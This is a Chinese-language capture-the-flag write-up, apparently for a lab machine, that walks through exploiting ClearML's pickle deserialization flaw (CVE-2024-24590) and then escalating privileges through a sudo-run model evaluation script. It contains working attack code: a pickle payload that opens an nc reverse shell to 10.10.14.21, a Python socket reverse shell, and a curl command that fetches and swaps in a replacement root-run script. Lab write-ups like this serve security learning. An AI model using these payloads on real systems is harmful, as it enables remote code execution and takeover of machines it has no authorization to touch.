端口扫描
80
按照教程注册安装clear ml
加载configuration的时候会报错
将json里的API,File Store的host都添加到/etc/hosts中
即可成功初始化
查找clear ml漏洞
发现一个cve-2024-24590
下面是一个利用脚本,但不能直接用
ClearML-vulnerability-exploit-RCE-2024-CVE-2024-24590-/exploit.py at main · LordVileOnX/ClearML-vulnerability-exploit-RCE-2024-CVE-2024-24590- (github.com)
查看All Experiments
有一个Review JSON Artifacts脚本
观察可知这个脚本会定时循环运行
以下是脚本代码,关键地方都做了注释
总而言之就是该脚本会检查所有标记为"review"的项目名为"Black Swan"的任务
如果artifact是dict类型,就会将其反序列化
# !/usr/bin/python3from clearml import Task
from multiprocessing import Process
from clearml.backend_api.session.client import APIClient#打印出传入的字典data中的所有键值对
def process_json_artifact(data, artifact_name):"""Process a JSON artifact represented as a Python dictionary.Print all key-value pairs contained in the dictionary."""print(f"[+] Artifact '{artifact_name}' Contents:")for key, value in data.items():print(f" - {key}: {value}")#接收一个task
def process_task(task):artifacts = task.artifacts#遍历task的所有artifacts#if 是dict,调用process_json_artifactfor artifact_name, artifact_object in artifacts.items():data = artifact_object.get()if isinstance(data, dict):process_json_artifact(data, artifact_name)else:print(f"[!] Artifact '{artifact_name}' content is not a dictionary.")def main():#初始化ClearML任务review_task = Task.init(project_name="Black Swan",task_name="Review JSON Artifacts",task_type=Task.TaskTypes.data_processing)# Retrieve tasks tagged for review#检索所有标记为"review"的项目名为"Black Swan"的任务tasks = Task.get_tasks(project_name='Black Swan', tags=["review"], allow_archived=False)if not tasks:print("[!] No tasks up for review.")returnthreads = []# 如果有任务,脚本将为每个任务创建一个进程,调用process_task函数来处理任务中的工件for task in tasks:print(f"[+] Reviewing artifacts from task: {task.name} (ID: {task.id})")p = Process(target=process_task, args=(task,))p.start()threads.append(p)task.set_archived(True)for thread in threads:thread.join(60)if thread.is_alive():thread.terminate()# Mark the ClearML task as completedreview_task.close()def cleanup():client = APIClient()tasks = client.tasks.get_all(system_tags=["archived"],only_fields=["id"],order_by=["-last_update"],page_size=100,page=0,)# delete and cleanup tasksfor task in tasks:# noinspection PyBroadExceptiontry:deleted_task = Task.get_task(task_id=task.id)deleted_task.delete(delete_artifacts_and_models=True,skip_models_used_by_other_tasks=True,raise_on_error=False)except Exception as ex:continueif __name__ == "__main__":main()cleanup()
以下是反弹shell的payload
from clearml import Task
import pickle, osclass Common:def __reduce__(self):command = f'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.21 1234 >/tmp/f'return (os.system, (command,))instance = Common()
#common = pickle.dumps(instance)
mydict = {'com_artifact': instance}task = Task.init(project_name='Black Swan', task_name='cctask', tags=["review"])
task.upload_artifact(name='cc', artifact_object=mydict, retries=2, wait_on_upload=True, extension_name=".pkl")
成功反弹
sudo -l 发现有sudo权限
以下是evaluate_model脚本
#!/bin/bash
# Evaluate a given model against our proprietary dataset.
# Security checks against model file included.if [ "$#" -ne 1 ]; then/usr/bin/echo "Usage: $0 <path_to_model.pth>"exit 1
fiMODEL_FILE="$1"
TEMP_DIR="/models/temp"
PYTHON_SCRIPT="/models/evaluate_model.py" /usr/bin/mkdir -p "$TEMP_DIR"file_type=$(/usr/bin/file --brief "$MODEL_FILE")# Extract based on file type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then# POSIX tar archive (older PyTorch format)/usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then# Zip archive (newer PyTorch format)/usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else/usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"exit 2
fi/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; dofickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then/usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."/bin/rm "$MODEL_FILE"breakfi
done/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"if [ -f "$MODEL_FILE" ]; then/usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."/usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"fi
#!/bin/bash:这是一个shebang行,告诉系统这个脚本应该使用Bash解释器来执行。 2-4. 注释:解释脚本的功能和安全检查。 5-7. 参数检查:脚本检查是否传入了一个参数(模型文件的路径)。如果没有传入参数,打印用法信息并退出。MODEL_FILE="$1":将脚本的第一个参数(模型文件的路径)赋值给变量MODEL_FILE。TEMP_DIR="/models/temp":设置一个临时目录的路径,用于存放解压的模型文件。PYTHON_SCRIPT="/models/evaluate_model.py":设置用于评估模型的Python脚本的路径。/usr/bin/mkdir -p "$TEMP_DIR":创建临时目录,如果目录已存在则不做任何操作。file_type=$(/usr/bin/file --brief "$MODEL_FILE"):使用file命令检查模型文件的类型,并将其存储在变量file_type中。 16-21.
文件类型检查:根据file_type的值,判断模型文件是POSIX tar归档还是Zip归档,并使用相应的命令解压到临时目录。
24-35.
安全检查:使用find命令查找临时目录中所有的.pkl文件,然后对每个文件使用fickling工具进行安全检查。如果fickling的输出表明文件包含"OVERTLY_MALICIOUS"(极度恶意)的组件,则打印警告信息,删除模型文件,并中断循环。
37-38. 清理临时文件:删除临时目录中的所有文件。- 删除临时目录:如果临时目录为空,则删除该目录。 42-45. 如果模型文件通过了安全检查,打印安全确认信息,并使用指定的Python脚本进行模型评估。
上述evaluate_model可利用的地方大概只有最后使用evaluate_model.py对传入的.pth执行那一段
就是这个(其实我也不确定…)
传入的pth可控制,猜测可以修改pth的内容实现提权
但是我没做,因为不太懂这个…
后面回去查看models目录的权限,发现jippity对该目录有修改权限
虽然jippity用户对原本的evaluate_model.py没有修改权限,但是因为有目录权限,可以通过删除原本的evaluate_model.py,再传入新的evaluate_model.py对其进行覆盖
搞一个python的反弹shell
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.21",2222));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
import pty;
pty.spawn("/bin/sh")
rm evaluate_model.pycurl http://10.10.14.21:8899/evaluate_model.py -o evaluate_model.pysudo /usr/bin/evaluate_model /models/*.pth
